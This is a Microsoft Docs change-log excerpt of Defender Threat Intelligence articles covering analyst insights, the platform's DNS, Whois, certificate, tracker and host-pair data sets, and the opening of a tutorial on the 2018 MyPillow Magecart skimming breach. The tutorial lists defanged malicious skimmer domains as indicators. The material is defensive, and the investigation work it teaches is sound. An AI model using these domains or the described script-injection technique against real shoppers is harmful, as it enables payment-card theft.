Updates from: 04/25/2024 03:16:49
Category Microsoft Docs article Related commit history on GitHub Change details
includes Defender Content Updates https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/defender/includes/defender-content-updates.md
-<!-- This file is generated automatically each week. Changes made to this file will be overwritten.-->
---
-## Week of February 26, 2024
--
-| Published On |Topic title | Change |
-|||--|
-| 3/1/2024 | [Microsoft Security Copilot and Microsoft Defender Threat Intelligence](/defender/threat-intelligence/security-copilot-and-defender-threat-intelligence) | modified |
includes Defender Threat Intelligence Content Updates https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/defender/includes/defender-threat-intelligence-content-updates.md
- Previously updated : 06/25/2022-
-<!-- This file is generated automatically each week. Changes made to this file will be overwritten.-->
---
-## Week of June 20, 2022
--
-| Published On |Topic title | Change |
-|||--|
-| 6/23/2022 | [Defender Threat Intelligence](/defender-threat-intelligence/index) | modified |
threat-intelligence Analyst Insights https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/defender/threat-intelligence/analyst-insights.md
-
Title: 'Microsoft Defender Threat Intelligence (Defender TI) Analyst Insights'
-description: 'In this overview article, learn about the Microsoft Defender Threat Intelligence (Defender TI)ΓÇÖs analyst insights feature.'
----- Previously updated : 08/02/2022---
-# Analyst insights
-
-In Microsoft Defender Threat Intelligence (Defender TI), the Analyst Insights section provides quick insights about the artifact that may help determine the next step in an investigation. This section will list any insights that apply to the artifact, as well as those that do not apply for additional visibility. In the below example, we can quickly determine that the IP Address is routable, hosts a web server, and had an open port within the past five days. Furthermore, the system displays rules that were not triggered, which can be equally helpful when kickstarting an investigation.
-
-![Analyst Insights Edge Screenshot](media/analystInsightsEdgeScreenshot.png)
-
-## Analyst insight types and questions they can address
-
-| Analyst insight types | Questions they can address |
-|--||
-| Blocklisted | Is/when was the domain, host, or IP address blocklisted? |
-| | How many times has Defender TI blocklisted the domain, host, or IP? |
-| Registered & Updated | How many days, months, years ago was the domain registered? |
-| | When was the domain WHOIS Record updated? |
-| Subdomain IP count | How many different IPs are associated with the subdomains of the domain? |
-| New subdomain observations | When was the last time Microsoft observed a new subdomain for the domain in question? |
-| Registered & Resolving | Does the domain queried exist? |
-| | Does the domain resolve to an IP address? |
-| Number of Domains sharing the WHOIS record | What other domains share the same WHOIS record? |
-| Number of domains sharing the Name Server | What other domains share the same name server record? |
-| Crawled by RiskIQ | When was this host or domain last crawled by Microsoft? |
-| International Domain | Is the domain queried for an international domain name (IDN)? |
-| Blocklisted by Third Party | Is this indicator blocklisted by a third-party? |
-| Tor Exit Node Status | Is the IP address in questions associated with The Onion Router Network (Tor)? |
-| Open Ports Detected | When did Microsoft last port scan this IP address? |
-| Proxy Status | What is the proxy status of this indicator? |
-| Host Last Observed | Is the IP address in question internet accessible? |
-| Hosts a Web Server | Does the IP address have a DNS server that uses its resources to resolve the name into it for the appropriate web server? |
-
-## Next steps
-
-For more information, see:
--- [Reputation scoring](reputation-scoring.md)-- [Using tags](using-tags.md)
threat-intelligence Data Sets https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/defender/threat-intelligence/data-sets.md
-
Title: 'Microsoft Defender Threat Intelligence (Defender TI) Data Sets'
-description: 'In this overview article, learn about Microsoft Defender Threat Intelligence (Defender TI)ΓÇÖs data sets feature.'
----- Previously updated : 08/02/2022---
-# Data sets
-
-Microsoft centralizes numerous data sets into a single platform, Microsoft Defender Threat Intelligence (Defender TI), making it easier for MicrosoftΓÇÖs community and customers to conduct infrastructure analysis. MicrosoftΓÇÖs primary focus is to provide as much data as possible about Internet infrastructure to support a variety of security use cases.
-
-Microsoft collects, analyzes, and indexes internet data to assist users in detecting and responding to threats, prioritizing incidents, and proactively identifying adversariesΓÇÖ infrastructure associated with actor groups targeting their organization. Microsoft collects internet data via itsΓÇÖ PDNS sensor network, global proxy network of virtual users, port scans, and leverages third-party sources for malware and added Domain Name System (DNS) data.
-
-This internet data is categorized into two distinct groups: traditional and advanced. Traditional data sets include Resolutions, Whois, SSL Certificates, Subdomains, DNS, Reverse DNS, and Services. Advanced data sets include Trackers, Components, Host Pairs, and Cookies. Trackers, Components, Host Pairs, and Cookies data sets are collected from observing the Document Object Model (DOM) of web pages crawled. Additionally, Components and Trackers are also observed from detection rules that are triggered based on the banner responses from port scans or SSL Certificate details.
-
-![Data Sets Edge Screenshot](media/dataSetsEdgeScreenshot.png)
-
-## Resolutions
-
-Passive DNS (PDNS) is a system of record that stores DNS resolution data for a given location, record, and timeframe. This historical resolution data set allows users to view which domains resolved to an IP address and vice versa. This data set allows for time-based correlation based on domain or IP overlap.
-PDNS may enable the identification of previously unknown or newly stood-up threat actor infrastructure. Proactive addition of indicators to blocklists can cut off communication paths before campaigns take place. Users will find A record resolution data within the Resolutions data set tab and will find more types of DNS records in the DNS data set tab.
-
-Our PDNS resolution data includes the following:
--- **Resolve:** the name of the resolving entity (either an IP Address or Domain)-- **Location:** the location the IP address is hosted in.-- **Network:** the netblock or subnet associated with the IP address.-- **ASN:** the autonomous system number and organization name-- **First Seen:** a timestamp that displays the date that we first observed this resolution.-- **Last Seen:** a timestamp that displays the date that we last observed this resolution.-- **Source:** the source that enabled the detection of the relationship.-- **Tags:** any tags applied to this artifact in the Defender TI system.-
-![Data Tab Resolutions](media/dataTabResolutions.png)
-
-## Questions this data set may help answer:
-
-### Domains
-- When was the domain first observed resolving to an IP address by Defender TI?-
- ![Data Sets Domain First Seen](media/dataSetsDomainFirstSeen.png)
--- When was the last time it was seen actively resolving to an IP address by Defender TI?
- ![Data Sets Domain Last Seen](media/dataSetsDomainLastSeen.png)
--- What IP address(s) does it currently resolve to?
- ![Data Sets Domain Active Re solutions](media/dataSetsDomainActiveResolutions.png)
-
-### IP Addresses
-- Is the IP address routable?-
- ![Data Sets Routable IPs](media/dataSetsRoutableIPs.png)
--- What subnet is it part of?-
- ![Data Sets IP Subnet](media/dataSetsIPSubnet.png)
--- Is there an owner associated with the subnet?
-
- ![Data Sets IP Owner](media/dataSetsIPOwner.png)
--- What AS is it part of?-
- ![Data Sets IPASN](media/dataSetsIPASN.png)
--- What geolocation is there?
- ![Data Sets IP Geo location](media/dataSetsIPGeolocation.png)
-
-## Whois
-
-Thousands of times a day, domains are bought and/or transferred between individuals and organizations. The process to make all of this happen is easy and only takes a few minutes and roughly $7 depending on the registrar provider. Beyond payment details, you must supply additional information about yourself, some of which gets stored as part of a Whois record once the domain has been set up. This would be considered a public domain registration. However, there are private domain registration services, where you can hide your personal information from your domainΓÇÖs Whois record. In these situations, the domain ownerΓÇÖs information is safe and replaced by their registrarΓÇÖs information. More actor groups are performing private domain registrations to make it more difficult for analysts to find other domains that they own. Defender TI provides a variety of data sets to find actorsΓÇÖ shared infrastructure when Whois records donΓÇÖt provide leads.
-
-Whois is a protocol that lets anyone query information about a domain, IP address, or subnet. One of the most common functions for Whois in threat infrastructure research is to identify or connect disparate entities based on unique data shared within Whois records. If you were reading carefully or ever purchased a domain yourself, you may have noticed that the content requested from the registrars is never verified. In fact, you could have put anything in the record (and a lot of people do) which would then be displayed to the world.
-
-Each Whois record has several different sections, all of which could include different information. Commonly found sections include ΓÇ£registrarΓÇ¥, ΓÇ£registrantΓÇ¥, ΓÇ£administratorΓÇ¥, and ΓÇ£technicalΓÇ¥ with each potentially corresponding to a different contact for the record. A lot of the time this data is duplicated across sections, but in some cases, there may be slight discrepancies, especially if an actor made a mistake. When viewing Whois information within Defender TI, you will see a condensed record that de-duplicates any data and notates which part of the record it came from. We have found this process greatly speeds up the analyst workflow and avoids any overlooking of data. The Defender TI's Whois information is powered by the WhoisIQΓäó database.
-
-Our Whois data includes the following:
-- **Record Updated:** a timestamp that indicates the day a Whois record was last updated.-- **Last Scanned:** the date that the Defender TI system last scanned the record.-- **Expiration:** the expiration date of the registration, if available.-- **Created:** the age of the current Whois record.-- **Whois Server:** the server is set-up by an ICANN accredited registrar to acquire up-to-date information about domains that are registered within it. -- **Registrar:** the registrar service used to register the artifact.-- **Domain Status:** the current status of the domain. An ΓÇ¥active" domain is live on the internet. -- **Email:** any email addresses found in the Whois record, and the type of contact each one is associated with (e.g. admin, tech).-- **Name:** the name of any contacts within the record, and the type of contact each is associated with.-- **Organization:** the name of any organizations within the record, and the type of contact each is associated with.-- **Street:** any street addresses associated to the record, and the type of contact it is associated with.-- **City:** any city listed in an address associated to the record, and the type of contact it is associated with.-- **State:** any states listed in an address associated to the record, and the type of contact it is associated with.-- **Postal Code:** any postal codes listed in an address associated to the record, and the type of contact it is associated with.-- **Country:** any countries listed in an address associated to the record, and the type of contact it is associated with.-- **Phone:** any phone numbers listed in the record, and the type of contact it is associated with.-- **Name Servers:** any name servers associated to the registered entity.-
-## Current Whois lookups
-
-![Data Tab WHOIS](media/dataTabWHOIS.png)
-
-Defender TIΓÇÖs current Whois repository highlights all domains in MicrosoftΓÇÖs Whois collection that are currently registered and associated with the Whois attribute of interest. This data highlights the domain's registration and expiration date, along with the email address used to register the domain. This data is displayed in the Whois Search tab of the platform.
-
-## Historical Whois lookups
-
-![Search Whois History](media/searchWhoisHistory.png)
-
-Defender TIΓÇÖs Whois History repository provides users with access to all known historical domain associations to Whois attributes based on the systemΓÇÖs observations. This data set highlights all domains associated with an attribute that a user pivots from displaying the first time and the last time we observed the association between the domain and attribute queried. This data is displayed in a separate tab next to the current Whois Search tab.
-
-**Questions this data set may help answer:**
--- How old is the domain?-
- ![Data Sets Whois Domain Age](media/dataSetsWhoisDomainAge.png)
--- Does the information appear to be privacy protected?-
- ![Data Sets Whois Privacy Protected](media/dataSetsWhoisPrivacyProtected.png)
--- Does any of the data appear to be unique?-
- ![Data Sets Whois Unique](media/dataSetsWhoisUnique.png)
--- What name servers are used?-
- ![Data Sets Whois Name Servers](media/dataSetsWhoisNameServers.png)
--- Is this a sinkhole domain?-
- ![Data Sets Whois Sinkhole](media/dataSetsWhoisSinkhole.png)
--- Is this a parked domain?-
- ![Data Sets Whois Parked Domain](media/dataSetsWhoisParkedDomain.png)
--- Is this a honeypot domain?-
- ![Data Sets Whois Honeypot Domain](media/dataSetsWhoisHoneypotDomain.png)
--- Is there any history?-
- ![Data Sets Whois History](media/dataSetsWhoisHistory.gif)
--- Are there any fake privacy protection emails?-
- ![Data Sets Whois Fake Privacy Emails](media/dataSetsWhoisFakePrivacyEmails.png)
--- Are there any fake names in the Whois record?--- Did you identify additional related IOCs from searching against potentially shared Whois values across domains?-
- ![Data Sets Whois Shared Value Search](media/dataSetsWhoisSharedValueSearch.gif)
-
-## Certificates
-Beyond securing your data, SSL Certificates are a fantastic way for users to connect disparate network infrastructure. Modern scanning techniques allow us to perform data requests against every node on the Internet in a matter of hours, meaning we can easily associate a certificate to an IP address hosting it on a regular basis.
-
-Much like a Whois record, SSL certificates require information to be supplied by the user to generate the final product. Aside from the domain, the SSL certificate is being created for (unless self-signed), any of the additional information can be made up by the user. Where MicrosoftΓÇÖs users see the most value from SSL certificates is not necessarily the unique data someone may use when generating the certificate, but where it's hosted.
-
-To access an SSL certificate, it needs to be associated with a web server and exposed through a particular port (most often 443). Using mass Internet scans on a weekly basis, it's possible to scan all IP addresses and obtain any certificate being hosted to build a historic repository of certificate data. Having a database of IP addresses to SSL certificate mappings provides users with a way to identify overlaps in infrastructure.
-
-To further illustrate this concept, imagine an actor has set up a server with a self-signed SSL certificate. After several days, defenders become wise to their infrastructure and block the webserver hosting malicious content. Instead of destroying all their hard work, the actor merely copies all the contents (including the SSL certificate) and places them on a new server. As a user, a connection can now be made using the unique SHA-1 value of the certificate to say that both web servers (one blocked, one unknown) are connected in some way.
-
-What makes SSL certificates more valuable is that they are capable of making connections that passive DNS or Whois data may miss. This means more ways of correlating potential malicious infrastructure and identifying potential operational security failures of actors. Defender TI has collected over 30 million certificates from 2013 until the present day and provides users with the tools to make correlations on certificate content and history.
-
-SSL certificates are files that digitally bind a cryptographic key to a set of user-provided details. Using internet-scanning techniques, Defender TI collects SSL certificate associations from IP addresses on various ports. These certificates are stored inside of a local database and allow us to create a timeline for where a given SSL certificate appeared on the Internet.
-
-Our certificate data includes the following:
--- **Sha1:** The SHA1 algorithm hash for an SSL Cert asset.-- **First Seen:** a timestamp that displays the date that we first observed this certificate on an artifact.-- **Last Seen:** a timestamp that displays the date that we last observed this certificate on an artifact.-- **Infrastructure:** any related infrastructure associated with the certificate.-
-![Data Tab Certificates List](media/dataTabCertificatesList.png)
-
-When a user expands on a SHA1 hash, the user will be able to see details about the following, which includes:**
-- **Serial Number:** The serial number associated with an SSL certificate.-- **Issued:** The date when a certificate was issued.-- **Expires:** The date when a certificate will expire.-- **Subject Common Name:** The Subject Common Name for any associated SSL Certs.-- **Issuer Common Name:** The Issuer Common Name for any associated SSL Certs.-- **Subject Alternative Name(s):** Any alternative common names for the SSL Cert.-- **Issuer Alternative Name(s):** Any additional names of the issuer.-- **Subject Organization Name:** The organization linked to the SSL certificate registration.-- **Issuer Organization Name:** The name of the organization that orchestrated the issue of a certificate.-- **SSL Version:** The version of SSL that the certificate was registered with.-- **Subject Organization Unit:** Optional metadata that indicates the department within an organization that is responsible for the certificate.-- **Issuer Organization Unit:** Additional information about the organization issuing the certificate.-- **Subject Street Address:** The street address where the organization is located.-- **Issuer Street Address:** The street address where the issuer organization is located.-- **Subject Locality:** The city where the organization is located.-- **Issuer Locality:** The city where the issuer organization is located.-- **Subject State/Province:** The state or province where the organization is located.-- **Issuer State/Province:** The state or province where the issuer organization is located.-- **Subject Country:** The country where the organization is located.-- **Issuer Country:** The country where the issuer organization is located.-- **Related Infrastructure:** any related infrastructure associated with the certificate.-
-![Data Tab Certificate Details](media/dataTabCertificateDetails.png)
-
-**Questions this data set may help answer:**
--- What other infrastructure has this certificate been observed associated with?-
- ![Data Sets Certificate Related Infrastructure](media/dataSetsCertificateRelatedInfrastructure.png)
--- Are there any unique data points in the certificate that would serve as good pivot points?-
- ![Data Sets Certificate Pivot Points](media/dataSetsCertificatePivotPoints.png)
--- Is the certificate self-signed?-
- ![Data Sets Certificate Self Signed](media/dataSetsCertificateSelfSigned.png)
--- Is the certificate from a free provider?-
- ![Data Sets CertificateFree Provider](media/dataSetsCertificateFreeProvider.png)
--- Over what timeframe has the certificate been observed in use?-
- ![Data Sets Certificates Observation Dates](media/dataSetsCertificatesObservationDates.png)
-
-## Subdomains
-
-A subdomain is an internet domain, which is part of a primary domain. Subdomains are also referred to as "hosts". As an example,`learn.microsoft.com` is a subdomain of `microsoft.com`. For every subdomain, there could be a new set of IP addresses to which the domain resolves to and this can be a great data source for finding related infrastructure.
-
-Our subdomain data includes the following:
--- **Hostname:** the subdomain associated with the domain that was searched.-- **Tags:** any tags applied to this artifact in the Defender TI system.-
-![Data Tab Sub domains](media/dataTabSubdomains.png)
-
-**Questions this data set may help answer:**
--- Are there more subdomains associated with the higher-level domain?-
- ![Data Sets Sub domains](media/dataSetsSubdomains.png)
--- Are any subdomains associated with malicious activity?-
- ![Data Sets Sub domains Malicious](media/dataSetsSubdomainsMalicious.png)
--- If this is your domain, do any subdomains look unfamiliar?--- Is there any pattern to the subdomains that are listed associated with other malicious domains?--- Does pivoting off each subdomain reveal new IP space not previously associated with the target?--- What other unrelated infrastructure can you find that does not match the root domain?-
-## Trackers
-
-Trackers are unique codes or values found within web pages and often used to track user interaction. These codes can be used to correlate a disparate group of websites to a central entity. Often, actors will copy the source code of a victimΓÇÖs website they are looking to impersonate for a phishing campaign. Seldomly will actors take the time to remove these IDs that allow users to identify these fraudulent sites using MicrosoftΓÇÖs Trackers data set. Actors may also deploy tracker IDs to see how successful their cyber-attack campaigns are. This is similar to marketers when they leverage SEO IDs, such as a Google Analytics Tracker ID, to track the success of their marketing campaign.
-
-MicrosoftΓÇÖs Tracker data set includes IDs from providers like Google, Yandex, Mixpanel, New Relic, Clicky, and is continuing to grow on a regular basis.
-
-Our tracker data includes the following:
--- **Hostname:** the hostname that hosts the infrastructure where the tracker was detected.-- **First Seen:** a timestamp that displays the date that we first observed this tracker on the artifact.-- **Last Seen:** a timestamp that displays the date that we last observed this tracker on the artifact.-- **Type:** the type of tracker that was detected (e.g. GoogleAnalyticsID, JarmHash).-- **Value:** the identification value for the tracker.-- **Tags:** any tags applied to this artifact in the Defender TI system.-
-![Data Tab Trackers](media/dataTabTrackers.png)
-
-**Questions this data set may help answer:**
--- Are there other resources using the same analytics IDs?-
- ![Data Sets Trackers Pivot Analytics Account](media/dataSetsTrackersPivotAnalyticsAccount.gif)
--- Are these resources associated with the organization, or are they attempting to conduct an infringement attack?--- Is there any overlap between trackersΓÇôare they shared with other websites?--- What are the types of trackers found within the web page?-
- ![Data Sets Trackers Types](media/dataSetsTrackersTypes.png)
--- What is the length of time for trackers?-
- ![Data Sets Trackers LengthOf Time](media/dataSetsTrackersLengthOfTime.png)
--- What is the frequency of change for tracker valuesΓÇô do they come, go, or remain?--- Are there any trackers linking to website cloning software (MarkOfTheWeb or HTTrack)?-
- ![Data Sets TrackersHt Track](media/dataSetsTrackersHtTrack.png)
--- Are there any trackers linking to malicious C2 server malware (JARM)?-
- ![Data Sets Trackers JARM](media/dataSetsTrackersJARM.png)
-
-## Components
-
-Web components are details describing a web page or server infrastructure gleaned from Microsoft performing a web crawl or scan. These components allow a user to understand the makeup of a webpage or the technology and services driving a specific piece of infrastructure.
-Pivoting on unique components can find actors' infrastructure or other sites that are compromised. Users can also understand if a website might be vulnerable to a specific attack or compromise based on the technologies that it is running.
-
-Our component data includes the following:
--- **Hostname:** the hostname that hosts the infrastructure where the component was detected.-- **First Seen:** a timestamp of the date that we first observed this component on the artifact.-- **Last Seen:** a timestamp of the date that we last observed this component on the artifact.-- **Category:** the type of component that was detected (e.g. Operating System, Framework, Remote Access, Server).-- **Name + Version:** the component name and the version running on the artifact (e.g. Microsoft IIS (v8.5).-- **Tags:** any tags applied to this artifact in the Defender TI system.-
-![Data Tab Components](media/dataTabComponents.png)
-
-**Questions this data set may help answer:**
--- What vulnerable infrastructure are you using?-
- ![Data Sets Components Vulnerable Components](media/dataSetsComponentsVulnerableComponents.png)
-
- ![Data Sets Components Prototype Js Vulnerable Version](media/dataSetsComponentsPrototypeJsVulnerableVersion.png)
-
- Magento v1.9 is so dated that Microsoft could not locate reliable documentation for that particular version.
--- What unique web components is the threat actor using that can track them to other domains?--- Are any components marked as malicious?--- What is the number of web components identified?-
- ![Data Sets Components Number Of Components](media/dataSetsComponentsNumberOfComponents.png)
--- Are there any unique or strange technologies not often seen?-
- ![Data Sets Components Unique Components](media/dataSetsComponentsUniqueComponents.png)
--- Are there any fake versions of specific technologies?--- What is the frequency of changes in web componentsΓÇôoften or rarely done?--- Are there any suspicious libraries known to be abused?--- Are there any technologies with vulnerabilities associated with them?-
-## Host pairs
-
-Host pairs are two pieces of infrastructure (a parent and a child) that share a connection observed from a virtual userΓÇÖs web crawl. The connection could range from a top-level redirect (HTTP 302) to something more complex like an iframe or script source reference.
-
-Our host pair data includes the following:
--- **Parent Hostname:** the host that is referencing an asset or ΓÇ£reaching outΓÇ¥ to the child host-- **Child Hostname:** the host that is being called on by the parent host-- **First Seen:** a timestamp of the date that we first observed a relationship with the host.-- **Last Seen:** a timestamp of the date that we last observed a relationship with the host.-- **Cause:** the type of connection between the parent and child hostname. Potential causes include script.src, link.href, redirect, img.src, unknown, xmlhttprequest, a.href, finalRedirect, css.import, or parentPage connections.-- **Tags:** any tags applied to this artifact in the Defender TI system.-
-![Data Tab Host Pairs](media/dataTabHostPairs.png)
-
-**Questions this data set may help answer:**
--- Have any of the connected artifacts been blocklisted?-- Have any of the connected artifacts been tagged (Phishing, APT, Malicious, Suspicious, Threat Actor Name)?-- Is this host redirecting users to malicious content?-
- ![Data Sets Host Pairs Malicious Redirect](media/dataSetsHostPairsMaliciousRedirect.png)
--- Are resources pulling in CSS or images to set up infringement attacks?-
- ![Data Sets Host Pairs Infringement Attack](media/dataSetsHostPairsInfringementAttack.png)
--- Are resources pulling in a script or referencing a link.href to set up a Magecart or skimming attack?
- ![Data Sets Host Pairs Skimmer Reference](media/dataSetsHostPairsSkimmerReference.png)
--- Where are users being redirected from/to?--- What type of redirection is taking place?-
-## Cookies
-
-Cookies are small pieces of data sent from a server to a client as the user browses the internet. These values sometimes contain a state for the application or little bits of tracking data. Defender TI highlights and indexes cookie names observed when crawling a website and allows users to dig into everywhere we have observed specific cookie names across its crawling and data collection. Cookies are also used by malicious actors to keep track of infected victims or store data to be used later.
-
-Our cookie data includes the following:
--- **Hostname:** the host infrastructure that is associated with the cookie.-- **First Seen:** a timestamp of the date that we first observed this cookie on the artifact.-- **Last Seen:** a timestamp of the date that we last observed this cookie on the artifact.-- **Name:** the name of the cookie (e.g. JSESSIONID, SEARCH_NAMESITE).-- **Domain:** the domain associated with the cookie.-- **Tags:** any tags applied to this artifact in the Defender TI system.-
-![Data Tab Cookies](media/dataTabCookies.png)
-
-**Questions this data set may help answer:**
--- What other websites are issuing the same cookies?-
- ![Data Sets Cookies Domains Issuing Same Cookie](media/dataSetsCookiesDomainsIssuingSameCookie.png)
--- What other websites are tracking the same cookies?
- ![Data Sets Cookies Domains Tracking Same Cookie](media/dataSetsCookiesDomainsTrackingSameCookie.png)
--- Does the cookie domain match your query?--- What is the number of cookies associated with the artifact?-
- ![Data Sets Cookies Number Associated with Artifact](media/dataSetsCookiesNumberAssociatedwithArtifact.png)
--- Are there unique cookie names or domains?--- What are the time periods associated with cookies?--- What is the frequency of newly observed cookies or changes associated with cookies?-
-## Services
-
-Service names and port numbers are used to distinguish between different services that run over transport protocols such as TCP, UDP, DCCP, and SCTP. Port numbers can suggest what type of application is running on a particular port. But applications or services can be changed to use a different port to obfuscate or hide the service or application on an IP address. Knowing the port and header/banner information can identify the true application/service and the combination of ports being used. Defender TI surfaces 14 days of history within the Services tab, displaying the last banner response associated with a port observed.
-
-Our Services data includes the following:
--- Open ports observed-- Port numbers-- Components-- Number of times the service was observed-- When the port was last scanned-- Protocol connection-- Status of the port
- - Open
- - Filtered
- - Closed
-- Banner response-
-![Data Tab Services](media/dataTabServices.png)
-
-**Questions this data set may help answer:**
--- What applications are running on a particular port for a given IP address?-
- ![Data Sets Services Applications Running](media/dataSetsServicesApplicationsRunning.png)
--- What version of applications are in use?-
- ![Data Sets Services Version Running](media/dataSetsServicesVersionRunning.png)
--- Have there been recent changes in the open, filtered, or closed status for a given port?-
- ![Data Sets Services Port Statuses](media/dataSetsServicesPortStatuses.png)
--- Was a certificate associated with the connection?-
- ![Data Sets Services Certificate Associations](media/dataSetsServicesCertificateAssociations.png)
--- Are vulnerable or deprecated technologies in use on a given asset?-
- ![Data Sets Services Applications Running](media/dataSetsServicesApplicationsRunning.png)
-
- ![Data Sets Services Vulnerable Service](media/dataSetsServicesVulnerableService.png)
--- Is information being exposed by a running service that could be used for nefarious purposes?--- Are security best practices being followed?-
-## DNS
-
-Microsoft has been collecting DNS records over the years, providing users insight into mail exchange (MX) records, nameserver (NS) records, text (TXT) records, start of authority (SOA) records, canonical name (CNAME) records, and pointer (PTR) records. Reviewing DNS records can be helpful to identify shared infrastructure used by actors across the domains they own. For example, actor groups tend to use the same nameservers to segment their infrastructure or the same mail exchange servers to administer their command and control.
-
-Our DNS data includes the following:
--- **Value:** the DNS record associated with the host.-- **First Seen:** a timestamp that displays the date that we first observed this record on the artifact.-- **Last Seen:** a timestamp that displays the date that we last observed this record on the artifact.-- **Type:** the type of infrastructure associated with the record. Potential options include Mail Servers (MX), text files (TXT), name servers (NS), CNAMES, and Start of Authority (SOA) records.-- **Tags:** any tags applied to this artifact in the Defender TI system.-
-![Data Tab DNS](media/dataTabDNS.png)
-
-**Questions this data set may help answer:**
--- What other pieces of infrastructure are directly related to the indicator I am searching?-- How has the infrastructure changed over time?-- Is the domain owner employing the services of a content delivery network or brand protection service?-- What other technologies might the associated organization be employing within their network?-
-## Reverse DNS
-
-While a forward DNS lookup queries the IP address of a certain hostname, a reverse DNS lookup queries a specific hostname of an IP address. This dataset will show similar results as the DNS dataset. Reviewing DNS records can be helpful to identify shared infrastructure used by actors across the domains they own. For example, actor groups tend to use the same nameservers to segment their infrastructure or the same mail exchange servers to administer their command and control.
-
-Our Reverse DNS data includes the following:
--- **Value:** the value of the Reverse DNS record.-- **First Seen:** a timestamp of the date that we first observed this record on the artifact.-- **Last Seen:** a timestamp of the date that we first observed this record on the artifact.-- **Type:** the type of infrastructure associated with the record. Potential options include Mail Servers (MX), text files (TXT), name servers (NS), CNAMES, and Start of Authority (SOA) records.-- **Tags:** any tags applied to this artifact in the Defender TI system.-
-![Data Tab Reverse DNS](media/dataTabReverseDNS.png)
-
-**Questions This Data Set May Help Answer:**
--- What DNS records have observed this host?-- How has the infrastructure that observed this host changed over time?-
-## Next steps
-
-For more information, see:
--- [Searching and pivoting](searching-and-pivoting.md)-- [Sorting, filtering, and downloading data](sorting-filtering-and-downloading-data.md)-- [Infrastructure chaining](infrastructure-chaining.md)-- [Tutorial: Gathering threat intelligence and infrastructure chaining](gathering-threat-intelligence-and-infrastructure-chaining.md)
threat-intelligence Gathering Threat Intelligence And Infrastructure Chaining https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/defender/threat-intelligence/gathering-threat-intelligence-and-infrastructure-chaining.md
-
Title: 'Tutorial: Gathering Threat Intelligence and Infrastructure Chaining using Microsoft Defender Threat Intelligence (Defender TI)'
-description: 'In this tutorial, learn how to gather threat intelligence and infrastructure chain together indicators of compromise in Microsoft Defender Threat Intelligence (Defender TI). This article will cover a historical investigation of the MyPillow Magecart breach.'
----- Previously updated : 08/02/2022----
-# Tutorial: Gathering threat intelligence and infrastructure chaining
-
-In this tutorial, you will learn how to:
-- Perform several types of indicator searches and gather threat and adversary intelligence-
- ![ti OverviewHome Page Chrome Screenshot](media/tiOverviewHomePageChromeScreenshot.png)
-
-## Prerequisites
--- A Microsoft Entra ID or personal Microsoft account. [Login or create an account](https://signup.microsoft.com/)-- A Microsoft Defender Threat Intelligence (Defender TI) Premium license.-
- > [!NOTE]
- > Users without a Defender TI Premium license will still be able to log into the Defender Threat Intelligence Portal and access our free Defender TI offering.
-
-## Disclaimer
-
-Microsoft Defender Threat Intelligence (Defender TI) may include live, real-time observations and threat indicators, including malicious infrastructure and adversary-threat tooling. Any IP and domain searches within our Defender TI platform are safe to search.
-
-Microsoft will share online resources (e.g., IP addresses, domain names) that should be considered real threats posing a clear and present danger.
-
-We ask that users use their best judgment and minimize unnecessary risk while interacting with malicious systems when performing the tutorial below. Please note that Microsoft has worked to minimize risk by defanging malicious IP addresses, hosts, and domains.
-
-## Before You Begin
-As the disclaimer states above, suspicious, and malicious indicators have been defanged for your safety. Please remove any brackets from IPs, domains, and hosts when searching in Defender TI. Do not search these indicators directly in your browser.
-
-## Perform several types of indicator searches and gather threat and adversary intelligence
-
-In this tutorial, you will perform a series of steps to [infrastructure chain](infrastructure-chaining.md) together indicators of compromise (IOCs) related to a Magecart breach and gather threat and adversary intelligence along the way. Infrastructure chaining leverages the highly connected nature of the internet to expand one IOC into many based on overlapping details or shared characteristics. Building infrastructure chains enables threat hunters or incident responders to profile an adversary's digital presence, letting them quickly pivot across these data sets to create context around an incident or investigation, allowing for more effective triage of alerting and actioning of incidents within an organization.
-
-![Infrastructure Chaining](media/infrastructureChaining.png)
-
-**Relevant Personas:** Threat Intelligence Analyst, Threat Hunter, Incident Responder, Security Operations Analyst
-
-### Magecart Breach
-
-Microsoft has been profiling and following the activities of Magecart, a syndicate of criminal cybergroups behind hundreds of breaches of online retail platforms by placing digital skimmers on compromised e-commerce sites.
-
-They do this by injecting a script designed to steal sensitive data that consumers enter into online payment forms on e-commerce websites directly or through compromised third-party suppliers that websites might depend upon to make their sites function.
-
-Back in October 2018, they infiltrated MyPillowΓÇÖs online website, mypillow.com, to steal payment information by injecting a script into their web store that was hosted on a typo-squat domain containing the skimmer, mypiltow.com.
-
-The MyPillow breach was a two-stage attack, with the first skimmer only active for a brief time before being identified as illicit and removed, but the attackers still had access to MyPillowΓÇÖs network and on October 26, 2018, Microsoft observed that they registered a new domain, livechatinc[.]org
-
-Magecart actors will typically register a domain infringement to make it look as similar as possible to the legitimate domain, so that if youΓÇÖre looking at the JavaScript code, unless you look really carefully, you may not notice they injected their own script thatΓÇÖs capturing the credit card payment information and pushing it to their own infrastructure, as a way to hide essentially.
-But because our virtual users capture the DOM and find all the dynamic links and changes made by JavaScript from the crawls on the backend, we were able to detect that activity and pinpoint that fake domain that was hosting the injected script into the MyPillow webstore.
-
-1. Access the [Defender Threat Intelligence portal](https://ti.defender.microsoft.com/).
-2. Complete Microsoft authentication to access portal.
-3. Search ΓÇÿmypillow.comΓÇÖ in Defender TIΓÇÖs Threat Intelligence Home Page.
- a. What articles are associated with this domain?
- - Consumers May Lose Sleep Over These Two Magecart Breaches
-
- ![Tutorial Infra Chain My Pillowcom Article](media/tutorialInfraChainMyPillowcomArticle.png)
-
-4. Select the ΓÇÿConsumers May Lose Sleep Over These Two Magecart BreachesΓÇÖ Article.
- a. What information is available about this related campaign?
- - This article was published on March 20, 2019, and provides insights as to how MyPillow was breached by the Magecart threat actor group in October of 2018. The article details how the attack was executed.
-5. Select the Public Indicators tab.
- a. What IOCs are listed related to this campaign?
- - amerisleep.github[.]io
- - cmytuok[.]top
- - livechatinc[.]org
- - mypiltow[.]com
-6. Select All in the drop down of the search bar and query ΓÇÿmypillow.comΓÇÖ. Then, navigate to the Data tab.
- a. What data set might be useful in finding evidence of a script injection?
- - Host pairs reveal connections between websites traditional data sources wouldnΓÇÖt surface (pDNS, Whois) and enables you to see where your resources are being used and vice-versa.
-7. Select the Host Pairs Data blade, sort by First Seen, and filter by script.src as the Cause. Page over until you find host pair relationships that took place in October of 2018.
- a. Do you notice any typosquat mypillow domains?
